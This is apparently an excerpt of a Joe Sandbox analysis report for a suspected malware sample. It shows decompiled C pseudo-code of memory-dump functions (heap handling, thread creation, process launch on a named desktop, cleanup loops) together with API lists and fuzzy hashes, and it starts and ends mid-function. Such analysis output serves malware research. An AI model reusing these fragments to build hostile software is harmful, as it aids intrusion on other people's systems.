										L15:
										HeapFree(GetProcessHeap(), 0, _t51);
										goto L1;
									} else {
										_t34 = _t31 +  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x3c)) + _t31 + 0x28));
										 *((intOrPtr*)(_t51 + 0xc)) = _t34;
										if(_t34 == 0) {
											L14:
											VirtualFree( *(_t51 + 8), 0, 0x8000);
											goto L15;
										} else {
											_t36 = CreateThread(0, 0, E00E88880, _t51, 0, 0);
											 *(_t51 + 0x10) = _t36;
											if(_t36 == 0) {
												goto L14;
											} else {
												 *((intOrPtr*)(_t51 + 4)) = _v28;
												_t38 =  *0xe8c274; // 0x0
												 *_t51 = _t38;
												 *0xe8c274 = _t51;
												goto L1;
											}
										}
									}
								}
								L17:
							}
						}
					}
					return _t25;
					goto L17;
				}
			}

0x00e88998
0x00e8899b
0x00e8899e
0x00e889a6
0x00e889a6
0x00e889a8
0x00e889aa
0x00e889ad
0x00e889b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00e889b3
0x00e889b3
0x00e889b3
0x00e889b5
0x00e889be
0x00e889c2
0x00000000
0x00000000
0x00e889c4
0x00e889c9
0x00000000
0x00000000
0x00000000
0x00e889c9
0x00e889cb
0x00e889ce
0x00e889d4
0x00e889d8
0x00e889de
0x00e889e3
0x00e889e9
0x00e889f2
0x00e889f4
0x00e889fb
0x00e88a12
0x00e88a16
0x00e889a3
0x00e889a3
0x00000000
0x00e88a18
0x00e88a1e
0x00e88a23
0x00e88a28
0x00e88a7b
0x00e88a85
0x00000000
0x00e88a2a
0x00e88a31
0x00e88a33
0x00e88a36
0x00e88a6b
0x00e88a75
0x00000000
0x00e88a38
0x00e88a46
0x00e88a4c
0x00e88a51
0x00000000
0x00e88a53
0x00e88a56
0x00e88a59
0x00e88a5e
0x00e88a60
0x00000000
0x00e88a60
0x00e88a51
0x00e88a36
0x00e88a28
0x00000000
0x00e88a16
0x00e889fb
0x00e889e3
0x00e88a96
0x00000000
0x00e88a96

APIs

GetProcessHeap.KERNEL32(00000008,00000014,?,000DBBA0,?,?,?,?,?,?,?,00E88F82), ref: 00E88A05
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00E88A0C
CreateThread.KERNEL32(00000000,00000000,00E88880,00000000,00000000,00000000), ref: 00E88A46
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,?,?,?,?,?,?,00E88F82), ref: 00E88A75
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00E88F82), ref: 00E88A7E
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00E88F82), ref: 00E88A85

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$AllocateCreateThreadVirtual
String ID:
API String ID: 1073023709-0
Opcode ID: ebabe90aad04bb95b3148bf36dd9a3b542aaa7c9f064b51a9b339c524fea609f
Instruction ID: 096f4cb3f63e75f93fae105b6175fe8d0068a5ac784ba0f9953d0164501424fc
Opcode Fuzzy Hash: ebabe90aad04bb95b3148bf36dd9a3b542aaa7c9f064b51a9b339c524fea609f
Instruction Fuzzy Hash: 27310471A40602AFDB14EF69CD85BA9B7B4FB85700F609155E94DF7280EF70D801CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E82180, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80
memoryprocessCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00E82180(WCHAR* __ecx, void* _a4, struct _PROCESS_INFORMATION* _a8) {
				char _v8;
				struct _STARTUPINFOW _v76;
				int _t29;
				WCHAR* _t31;
				int _t35;
				void* _t36;

				_t35 = 0;
				_t31 = __ecx;
				memset( &_v76, 0, 0x44);
				_t36 = _a4;
				_v76.cb = 0x44;
				if(_t36 == 0) {
					return CreateProcessW(0, _t31, 0, 0, 0, 0, 0, 0,  &_v76, _a8);
				} else {
					_t5 = _t35 + 0x10; // 0x10
					E00E81830(0xe81030, _t5, 0x47deb7fb,  &_a4);
					_v76.lpDesktop = _a4;
					_push(0);
					_push(_t36);
					_push( &_v8);
					if( *0xe8c21c() != 0) {
						_t29 =  *0xe8c04c(_t36, 0, _t31, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a8);
						_t35 = _t29;
						 *0xe8c220(_v8);
					}
					HeapFree(GetProcessHeap(), 0, _a4);
					return _t35;
				}
			}

0x00e8218b
0x00e82192
0x00e82194
0x00e8219a
0x00e821a0
0x00e821a9
0x00e8223e
0x00e821ab
0x00e821b9
0x00e821bc
0x00e821c7
0x00e821cd
0x00e821ce
0x00e821cf
0x00e821d8
0x00e821f0
0x00e821f9
0x00e821fb
0x00e821fb
0x00e8220d
0x00e8221b
0x00e8221b

APIs

memset.NTDLL ref: 00E82194
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00E8A52C), ref: 00E82232

Part of subcall function 00E81830: GetProcessHeap.KERNEL32(00000008,00E89F6B,00000000,00000000,00E81004,?,00E815F4,4DBAC13F,00E89F6B,?,00000000), ref: 00E81844
Part of subcall function 00E81830: RtlAllocateHeap.NTDLL(00000000,?,00E815F4), ref: 00E8184B

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E82206
HeapFree.KERNEL32(00000000), ref: 00E8220D

Strings

D, xrefs: 00E821A0

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCreateFreememset
String ID: D
API String ID: 3667606640-2746444292
Opcode ID: 04b63bf62c5f766bf3e8d776835228ab78fe851dd3387fb01c92618ca79b91d3
Instruction ID: 72551e1b34c3cb4e9afb5676db408762412f83da31cc9854e5d636208da7768a
Opcode Fuzzy Hash: 04b63bf62c5f766bf3e8d776835228ab78fe851dd3387fb01c92618ca79b91d3
Instruction Fuzzy Hash: DE114A76600208BFDB109B96EC49EDF7F7CEB86755F104025FA0CA6250D6319A598BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E823F0, Relevance: 7.6, APIs: 5, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00E82422
RtlAllocateHeap.NTDLL(00000000), ref: 00E82429
memcpy.NTDLL(00E88583,?,?), ref: 00E82467
GetProcessHeap.KERNEL32(00000000,00E88583), ref: 00E8250A
HeapFree.KERNEL32(00000000), ref: 00E82511

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: efa356e4a17878420707b423dc1b5c2133e45992b7ab2e80406663934b3a8e18
Instruction ID: 372a03db5ab1580bf417f352ace947d1a9debc08ecc52eae8ad1b483171e6b95
Opcode Fuzzy Hash: efa356e4a17878420707b423dc1b5c2133e45992b7ab2e80406663934b3a8e18
Instruction Fuzzy Hash: D4416D71900209EFDB11DFA5DC48FAABBB9EF45344F244069EA0DF71A1E7319A08DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E82530, Relevance: 7.6, APIs: 5, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,00E88644,?), ref: 00E8256D
RtlAllocateHeap.NTDLL(00000000), ref: 00E82574
memcpy.NTDLL(00E88644,?,?), ref: 00E825AE
GetProcessHeap.KERNEL32(00000000,00E88644), ref: 00E8260C
HeapFree.KERNEL32(00000000), ref: 00E82613

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: f27d5af63ca81e4cbf683da03864efda5c7905ec9d8d0fd63b391c5bb46a6769
Instruction ID: 792712899fefd4052d7223d915289461000402bb8e503d712bf5d76cbb3100bb
Opcode Fuzzy Hash: f27d5af63ca81e4cbf683da03864efda5c7905ec9d8d0fd63b391c5bb46a6769
Instruction Fuzzy Hash: B031C171640204FFEB109FA5EC89B99BBB9FF09744F200165FA0DF61A0E7719954DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E88290, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E88290(int* __ecx, signed int _a8) {
				intOrPtr _t66;
				int* _t88;
				signed int _t89;
				void* _t90;

				_t89 = _a8;
				_t88 = __ecx;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = _t89;
				__ecx[3] = (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20 >> 0x1f) + (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20) + 1;
				__ecx[5] = _t89 >> 0x0000000e & 0x00000001;
				__ecx[4] = (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20 >> 0x1f) + 1 + (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20);
				if((_t89 & 0x00008000) == 0) {
					_t17 = _t88 + 0x29272; // 0x29272
					memset(_t17, 0, 0x10000);
					_t90 = _t90 + 0xc;
				}
				_t18 = _t88 + 0x9273; // 0x9273
				 *(_t88 + 0x44) = 0;
				 *((intOrPtr*)(_t88 + 0x28)) = _t18;
				_t21 = _t88 + 0x9272; // 0x9272
				 *((intOrPtr*)(_t88 + 0x2c)) = _t21;
				_t23 = _t88 + 0x39272; // 0x39272
				_t66 = _t23;
				 *((intOrPtr*)(_t88 + 0x30)) = _t66;
				 *((intOrPtr*)(_t88 + 0x34)) = _t66;
				_t26 = _t88 + 0x8192; // 0x8192
				 *(_t88 + 0x40) = 0;
				 *(_t88 + 0x3c) = 0;
				 *(_t88 + 0x24) = 0;
				 *(_t88 + 0x20) = 0;
				 *(_t88 + 0x1c) = 0;
				 *(_t88 + 0x68) = 0;
				 *(_t88 + 0x48) = 0;
				 *(_t88 + 0x64) = 0;
				 *(_t88 + 0x60) = 0;
				 *(_t88 + 0x5c) = 0;
				 *(_t88 + 0x58) = 0;
				 *((intOrPtr*)(_t88 + 0x38)) = 8;
				 *(_t88 + 0x6c) = 0;
				 *(_t88 + 0x54) = 0;
				 *(_t88 + 0x50) = 0;
				 *(_t88 + 0x4c) = 0;
				 *((intOrPtr*)(_t88 + 0x18)) = 1;
				 *(_t88 + 0x70) = 0;
				 *(_t88 + 0x74) = 0;
				 *(_t88 + 0x78) = 0;
				 *(_t88 + 0x7c) = 0;
				 *(_t88 + 0x80) = 0;
				 *(_t88 + 0x84) = 0;
				 *(_t88 + 0x88) = 0;
				 *(_t88 + 0x8c) = 0;
				memset(_t26, 0, 0x240);
				_t52 = _t88 + 0x83d2; // 0x83d2
				memset(_t52, 0, 0x40);
				return 0;
			}

0x00e88294
0x00e882aa
0x00e882bc
0x00e882c2
0x00e882c9
0x00e882cc
0x00e882d4
0x00e882ef
0x00e882f8
0x00e882ff
0x00e88308
0x00e8830e
0x00e8830e
0x00e88311
0x00e88317
0x00e8831e
0x00e88321
0x00e88327
0x00e8832a
0x00e8832a
0x00e88335
0x00e88338
0x00e8833b
0x00e88344
0x00e8834b
0x00e88352
0x00e88359
0x00e88360
0x00e88367
0x00e8836e
0x00e88375
0x00e8837c
0x00e88383
0x00e8838a
0x00e88391
0x00e88398
0x00e8839f
0x00e883a6
0x00e883ad
0x00e883b4
0x00e883bb
0x00e883c2
0x00e883c9
0x00e883d0
0x00e883d7
0x00e883e1
0x00e883eb
0x00e883f5
0x00e883ff
0x00e88407
0x00e88410
0x00e8841e

APIs

memset.NTDLL ref: 00E88308
memset.NTDLL ref: 00E883FF
memset.NTDLL ref: 00E88410

Strings

VUUU, xrefs: 00E88297
VUUU, xrefs: 00E882CF

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: memset
String ID: VUUU$VUUU
API String ID: 2221118986-3149182767
Opcode ID: 4a2dea14071bbfd9fc5d299b1e30f4387b40499f7714010a1e257612755d017a
Instruction ID: 10c1dc29b9562b27360b8070134383588bb39efab51ca219914d4df8579dc1d9
Opcode Fuzzy Hash: 4a2dea14071bbfd9fc5d299b1e30f4387b40499f7714010a1e257612755d017a
Instruction Fuzzy Hash: EA41CBB1601A06BBE308CF65C569782FBE4FF44708F548219D6599BB80D7BAB168CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 00E899A0, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81830: GetProcessHeap.KERNEL32(00000008,00E89F6B,00000000,00000000,00E81004,?,00E815F4,4DBAC13F,00E89F6B,?,00000000), ref: 00E81844
Part of subcall function 00E81830: RtlAllocateHeap.NTDLL(00000000,?,00E815F4), ref: 00E8184B

_snwprintf.NTDLL ref: 00E899E3
GetProcessHeap.KERNEL32(00000000,00E88F37), ref: 00E89A5E
HeapFree.KERNEL32(00000000), ref: 00E89A65
GetProcessHeap.KERNEL32(00000000,?), ref: 00E89A70
HeapFree.KERNEL32(00000000), ref: 00E89A77

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate_snwprintf
String ID:
API String ID: 2579732983-0
Opcode ID: 9cca53f9d7c95922575095908bc136d3ffc32b31dfdd82d80560a472853bf275
Instruction ID: 6d3b6eff14eff04f439e2b75d4517d1f91fc19f85581518dc2a95f31f31515e5
Opcode Fuzzy Hash: 9cca53f9d7c95922575095908bc136d3ffc32b31dfdd82d80560a472853bf275
Instruction Fuzzy Hash: 8D215471A80208FFEB10ABE1AD4AFE9777D9B09701F2010A1FB0DF51E1D7B15A588B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E88AA0, Relevance: 7.5, APIs: 5, Instructions: 49
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E88AA0() {
				int _t8;
				void* _t16;
				void* _t17;

				_t17 =  *0xe8c274; // 0x0
				if(_t17 != 0) {
					do {
						_t8 =  *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0xb, 0);
						_t17 =  *_t17;
					} while (_t17 != 0);
					_t17 =  *0xe8c274; // 0x0
				}
				_t16 = 0xe8c274;
				while(_t17 != 0) {
					_t8 = WaitForSingleObject( *(_t17 + 0x10), 0xffffffff);
					if(_t8 == 0x102) {
						_t16 = _t17;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0, 0);
						VirtualFree( *(_t17 + 8), 0, 0x8000);
						CloseHandle( *(_t17 + 0x10));
						 *_t16 =  *_t17;
						_t8 = HeapFree(GetProcessHeap(), 0, _t17);
					}
					_t17 =  *_t16;
				}
				return _t8;
			}

0x00e88aa1
0x00e88aaa
0x00e88ab0
0x00e88aba
0x00e88abc
0x00e88abe
0x00e88ac2
0x00e88ac2
0x00e88ac8
0x00e88acf
0x00e88ad6
0x00e88ae1
0x00e88b1e
0x00e88ae3
0x00e88aed
0x00e88af9
0x00e88b02
0x00e88b0d
0x00e88b16
0x00e88b16
0x00e88b20
0x00e88b22
0x00e88b28

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,00E89315,00E89286), ref: 00E88AD6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E88AF9
CloseHandle.KERNEL32(?), ref: 00E88B02
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E88B0F
HeapFree.KERNEL32(00000000), ref: 00E88B16

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: e101534b508a900fea771a824d9ba88a5fc7dff76d124704f76246e9d6babd0a
Instruction ID: 514226e088d506676fb77616de9a0e2c22298a17c505aefc3cc430a060625fc1
Opcode Fuzzy Hash: e101534b508a900fea771a824d9ba88a5fc7dff76d124704f76246e9d6babd0a
Instruction Fuzzy Hash: F0016936941A20AFDB315F95DC49B0677B1EF46B20F254A14FDADBB6E0CB30AC458B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E888B0, Relevance: 7.5, APIs: 5, Instructions: 40
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E888B0(long __ecx) {
				int _t6;
				long _t13;
				void* _t15;
				void* _t16;

				_t16 =  *0xe8c274; // 0x0
				_t13 = __ecx;
				_t15 = 0xe8c274;
				while(_t16 != 0) {
					_t6 = WaitForSingleObject( *(_t16 + 0x10), _t13);
					if(_t6 == 0x102) {
						_t15 = _t16;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc))))( *(_t16 + 8), 0, 0);
						VirtualFree( *(_t16 + 8), 0, 0x8000);
						CloseHandle( *(_t16 + 0x10));
						 *_t15 =  *_t16;
						_t6 = HeapFree(GetProcessHeap(), 0, _t16);
					}
					_t16 =  *_t15;
				}
				return _t6;
			}

0x00e888b2
0x00e888b8
0x00e888bb
0x00e888c2
0x00e888c8
0x00e888d3
0x00e88910
0x00e888d5
0x00e888df
0x00e888eb
0x00e888f4
0x00e888ff
0x00e88908
0x00e88908
0x00e88912
0x00e88914
0x00e8891b

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,000DBBA0,?,00E88F3E), ref: 00E888C8
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,00E88F3E), ref: 00E888EB
CloseHandle.KERNEL32(?,?,000DBBA0,?,00E88F3E), ref: 00E888F4
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00E88F3E), ref: 00E88901
HeapFree.KERNEL32(00000000,?,000DBBA0,?,00E88F3E), ref: 00E88908

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: dc47daad317626bc03f7b3554237b99b0e2f24213245087dba794d6c42ff3690
Instruction ID: bbd717c03832b0609edfe312fec08f7022ba11b8a4be343d0ef5baafcc1c176e
Opcode Fuzzy Hash: dc47daad317626bc03f7b3554237b99b0e2f24213245087dba794d6c42ff3690
Instruction Fuzzy Hash: B6F08C31641610AFEB206BA5DC8DB1677B5EF46711F200424F98DF72B1C770AC448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E81E50, Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00E81E50(void* __ecx, void** __edx, long* _a4) {
				long _v8;
				long _v12;
				long _v16;
				void** _v20;
				long _t36;
				void* _t42;
				long _t46;
				void* _t49;
				void* _t52;
				void* _t53;

				_push(0);
				_v20 = __edx;
				_push( &_v8);
				_v8 = 4;
				_t42 = __ecx;
				_push( &_v16);
				_push(0x20000005);
				_push( *((intOrPtr*)(__ecx + 8)));
				if( *0xe8c238() == 0) {
					return 0;
				} else {
					_t49 = RtlAllocateHeap(GetProcessHeap(), 0, _v16);
					if(_t49 == 0) {
						return 0;
					} else {
						_v8 = 0;
						_v12 = 0;
						_t53 =  *0xe8c248( *((intOrPtr*)(_t42 + 8)), _t49, _v16,  &_v12, _t52);
						if(_t53 == 0) {
							L7:
							HeapFree(GetProcessHeap(), 0, _t49);
							if(_t53 != 0) {
								goto L8;
							}
						} else {
							while(1) {
								_t36 = _v12;
								if(_t36 == 0) {
									break;
								}
								_t46 = _v8 + _t36;
								_v8 = _t46;
								_t53 =  *0xe8c248( *((intOrPtr*)(_t42 + 8)), _t49 + _t46, _v16 - _t46,  &_v12);
								if(_t53 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L9;
							}
							if(_t53 != 0) {
								L8:
								 *_v20 = _t49;
								 *_a4 = _v8;
							} else {
								goto L7;
							}
						}
						L9:
						return _t53;
					}
				}
			}

0x00e81e57
0x00e81e5c
0x00e81e5f
0x00e81e63
0x00e81e6a
0x00e81e6c
0x00e81e6d
0x00e81e72
0x00e81e7d
0x00e81f30
0x00e81e83
0x00e81e96
0x00e81e9a
0x00e81f29
0x00e81ea0
0x00e81ea4
0x00e81eaf
0x00e81ec0
0x00e81ec4
0x00e81ef8
0x00e81f02
0x00e81f0a
0x00000000
0x00000000
0x00e81ec6
0x00e81ec6
0x00e81ec6
0x00e81ecb
0x00000000
0x00000000
0x00e81ed0
0x00e81edb
0x00e81eec
0x00e81ef0
0x00000000
0x00e81ef2
0x00000000
0x00e81ef2
0x00000000
0x00e81ef0
0x00e81ef6
0x00e81f0c
0x00e81f12
0x00e81f17
0x00000000
0x00000000
0x00000000
0x00e81ef6
0x00e81f19
0x00e81f21
0x00e81f21
0x00e81e9a

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,00E88631), ref: 00E81E89
RtlAllocateHeap.NTDLL(00000000), ref: 00E81E90
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E81EFB
HeapFree.KERNEL32(00000000), ref: 00E81F02

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: d27623ce0f973ea2ad25700f2a435c6e51166ed4abc18f99e6ddbe09a938daab
Instruction ID: 769af0bfe27a30e2dee8b9d5f42706f45b419096775191188ba002bb51f5e1a4
Opcode Fuzzy Hash: d27623ce0f973ea2ad25700f2a435c6e51166ed4abc18f99e6ddbe09a938daab
Instruction Fuzzy Hash: 32213C72A01208AFDB119F99DC88FAEBBBCEB45715F1401A5ED0CF7250D7319E059BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E88420, Relevance: 6.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E88420(intOrPtr __ecx, signed int __edx, long* _a4) {
				intOrPtr _v8;
				void* _t20;
				signed int _t28;
				signed int _t36;
				long _t44;
				void* _t45;

				_t36 = __edx;
				_t26 = _a4;
				_v8 = __ecx;
				_t28 = __edx * 0x6e;
				_t44 =  >  ? (0x51eb851f * _t28 >> 0x20 >> 5) - 0xffffff80 : ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) + 0x85 + __edx + ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) * 4;
				 *_a4 = _t44;
				_t20 = RtlAllocateHeap(GetProcessHeap(), 0, _t44);
				_t45 = _t20;
				if(_t45 == 0) {
					return _t20;
				} else {
					_push(_t28);
					if(E00E829B0(_t45, _t26, _v8, _t36) == 0) {
						return _t45;
					}
					HeapFree(GetProcessHeap(), 0, _t45);
					return 0;
				}
			}

0x00e88429
0x00e8842b
0x00e88433
0x00e88438
0x00e88460
0x00e88466
0x00e8846f
0x00e88475
0x00e88479
0x00e884b1
0x00e8847b
0x00e8847b
0x00e8848e
0x00000000
0x00e884a9
0x00e8849a
0x00e884a8
0x00e884a8

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00E88468
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00E8846F

Part of subcall function 00E829B0: memset.NTDLL ref: 00E829C4

GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00E88493
HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 00E8849A

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: ad457b070ec7fdf3ffb2f88f23d2370f925cf2c8a83ca1d20f2b4d2905cf343d
Instruction ID: 318343a39513d8d7029cf3ccbe5f74716a559ae17514d31f7c6fc8766380d7ea
Opcode Fuzzy Hash: ad457b070ec7fdf3ffb2f88f23d2370f925cf2c8a83ca1d20f2b4d2905cf343d
Instruction Fuzzy Hash: 8F010433F015306FD7249AAAAC4DA5EBBA9DBC9661F414271FD0CE7384EA318C0483E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E818D0, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E818D0() {
				short _v524;
				signed int _t14;
				signed char _t16;
				void* _t21;
				void* _t22;

				memset( &_v524, 0, 0x208);
				if( *0xe8c7c0 == 0) {
					L9:
					return 1;
				} else {
					_t21 = 0;
					do {
						_t2 = _t21 + 0xe8c7c0; // 0x0
						_t14 =  *_t2 & 0x0000ffff;
						_t21 = _t21 + 2;
						 *(_t22 + _t21 - 0x20a) = _t14;
						if(_t14 != 0x5c) {
							goto L8;
						} else {
							_t16 = GetFileAttributesW( &_v524);
							if(_t16 != 0xffffffff) {
								if((_t16 & 0x00000010) == 0) {
									goto L6;
